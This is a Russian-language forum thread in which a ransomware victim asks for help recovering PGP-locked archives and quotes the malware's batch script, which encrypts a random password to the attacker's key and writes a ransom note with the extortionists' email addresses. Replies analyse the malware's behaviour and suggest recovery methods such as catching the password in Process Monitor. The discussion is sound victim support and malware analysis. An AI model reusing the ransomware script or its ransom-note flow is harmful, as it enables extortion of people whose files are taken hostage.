id: Гость   вход   регистрация
текущее время 08:41 25/11/2017
Автор темы: Гость, тема открыта 19/01/2015 06:48 Печать
Категории: криптоанализ, атаки, социальная инженерия
https://www.pgpru.com/Форум/РаботаСPGP/ПомогитеСРасшифровкойPGP
создать
просмотр
ссылки

Помогите с расшифровкой PGP


Столкнулся с вирусом.
Он зашифровал с помощью PGP файлы.
Остались файлы pubring.pgp; randseed.bin ;
password.asc:



pa.bat:


if exist morjik goto endd
echo morjik>morjik


rem start winsor.exe
soundpass.exe
pgp.exe -ea password.txt asik
chcp 1251
for /F ~%%a in ('Date /t') Do ( for /f %%b in ('Time /t') do echo %%a - %%b>>password.asc)
echo Файлы запакованы в архивы с паролем.>>password.asc
echo Стоимость разархивации 10.000 рублей.>>password.asc
echo Для распаковки файлов пришлите два файла на e-mail: cricketgump@gmail.com >>password.asc
echo - файл который Вы сейчас читаете;>>password.asc
echo - один заархивированный файл небольшого размера;>>password.asc
echo В ответ на Ваше письмо придет оригинальный файл и инструкция по оплате.>>password.asc
echo (Оригинальный файл является подтверждением того, что возможно вернуть все данные в исходное состояние)>>password.asc
echo После оплаты придет пароль на архивы и программа, которая распакует все файлы.>>password.asc
echo Ответ на Ваше письмо придет в течение 24 часов.>>password.asc
echo Если ответ не приходит более 24 часов пришлите два файла на резервную почту: cricketgump@mail2tor.com>>password.asc
moar.exe
goto endd2
:endd
rem start winsor.exe


:endd2


Можно ли как нибудь расшифровать пароль на архивы?


 
Комментарии
— SATtva (19/01/2015 09:33)   профиль/связь   <#>
комментариев: 11514   документов: 1035   редакций: 4046
Пароль — маловероятно. Он зашифрован открытым ключом, закрытая часть которого находится у вымогателя. Чем он там шифровал непосредственно Ваши файлы с помощью этого пароля — вопрос; если какой-нибудь самописной софтиной, то, возможно, в ней есть какая-нибудь уязвимость.
— Михаил (19/01/2015 11:51)   <#>
папка с его программой... и с остальными файлами
вот что смог
— Гость (19/01/2015 14:07)   <#>
какой пароль на архив по ссылке?
— Мишель (19/01/2015 15:31)   <#>
Столкнулись с этими же ребятами, тёти из бухгалтерии не глядя запустили вирусню из почты и заархивировали файлы на сетевом диске. Мы разобрались в алгоритме PGP и поняли, что расшифровать не получится. Вытрясли из бухгалтерии 10000 и заплатили, т.к. инфа зашифрована критичная. Чуваки прислали в ответ пароль. Кстати, длина пароля – 64 символа, так что про подбор забудьте. Всё что вы имеете – это сам пароль от архивов в зашифрованном виде (PGP message), который расшифровать могут только злоумышленники, имеющие закрытый ключ. Пароль в процессе заражения генерируется случайным образом, записывается в файл password.txt, потом считывается кодироващиком (moar.exe), который в свою очередь затирает файл с паролем и проходит по всем дискам (в т.ч. сетевым), архивируя файлы. Кстати, у нас вирусня была запущена на двух компах, соответственно получилось два разных пароля. Чуваки прислали нам оба за указанную сумму. И еще: файлы вируса лежат в скрытой папке "C:\wintemp_".
— ressa (19/01/2015 15:49)   профиль/связь   <#>
комментариев: 1079   документов: 58   редакций: 59
Всегда ржал над этими, как ты правильно сказал, тетками из бухгалтерии. И на УСН и на ОСНО – вполне себе справляется облачный Б-Контур – в остальном же им вообще винда не нужна. Изначально подбирать банк, с клиентом под Linux, к примеру ПСБ и все. 10 000р – легко отделались, малой кровью так сказать. Попросили бы миллион и сидели бы потом все без премий с урезанными окладами, пока этот миллион бы не отбился ибо "шифровальщик был с GPG". Я тебе не про твой лично случай а про бухгалтерию в целом. А то там начинается право выбора "Мне винда привычнее", "А мне 1С удобнее" и тд. Ну или браузеры бы принудительно из под SanBoxIE запускали бы им, хотя в случае винды точно не спасет.
— Гость (21/01/2015 03:44)   <#>
Пароль 123 на архив сорри что забыл сказать
— Гость (21/01/2015 03:46)   <#>
Нельзя ли открыть файл Moar.exe и узнать что да как?
— Мишель (22/01/2015 10:34)   <#>
Открыли. Moar.exe читает сгенерированный пароль из файла, удаляет файл с паролем и архивирует пользовательские файлы. Пока процесс архивации идет – пароль можно перехватить с помощью Process Monitor: moar.exe запускает rar.exe для каждого файла с открытым паролем в параметрах запуска. Как только moar.exe закончил свою работу – всё, пароль забыт. Остается только в PGP-зашифрованном виде.
— Гость (22/01/2015 15:11)   <#>
Т.е. если я запущу его еще раз, отслежу пароль, то пароль будет другим на предыдущие задания?
Создались множество архивов....
— Гость (22/01/2015 18:45)   <#>
Пароль действительно имеет длину 64 символа. Но пароль, который удалось получить через процесс эксплорер состоит из цифр и пароль имеет вид такой 4639847246398472463984724639847246398472463984724639847246398472
тупо повторение 8 раз блока в восьми цифр. Осталось найти подборщик.
— sentaus (22/01/2015 23:14)   профиль/связь   <#>
комментариев: 1058   документов: 16   редакций: 32
А файловую систему поковырять не пробовали каким-нибудь testdisk-ом?

Пароль в момент запуска pgp.exe, похоже, лежит на диске в файле password.txt открытым текстом. Если он не затирается, а просто удаляется, то вытащить не должно быть большой проблемой.
— Михаил (29/01/2015 06:47)   <#>
Попробую конечно...но мы уже искали другими программами по восстановлению удаленных файлов,безуспешно.не нашлось ни одного password.txt
— Денис (28/02/2015 22:29)   <#>
МИшель, а это нескромно будет попросить у вас его программу для дешифровки?
— Гость (01/03/2015 02:03)   <#>
Помогите с расшифровкой PGP

Столкнулся с вирусом.
Он зашифровал с помощью PGP файлы.

— Мишель (19/01/2015 15:31) <#>
Столкнулись с этими же ребятами, тёти из бухгалтерии не глядя запустили вирусню из почты и заархивировали файлы на сетевом диске. Мы разобрались в алгоритме PGP и поняли, что расшифровать не получится. Вытрясли из бухгалтерии 10000 и заплатили, т.к. инфа зашифрована критичная. Чуваки прислали в ответ пароль.

Эти пароли могут быть одинаковыми?
Ваша оценка документа [показать результаты]
-3-2-1 0+1+2+3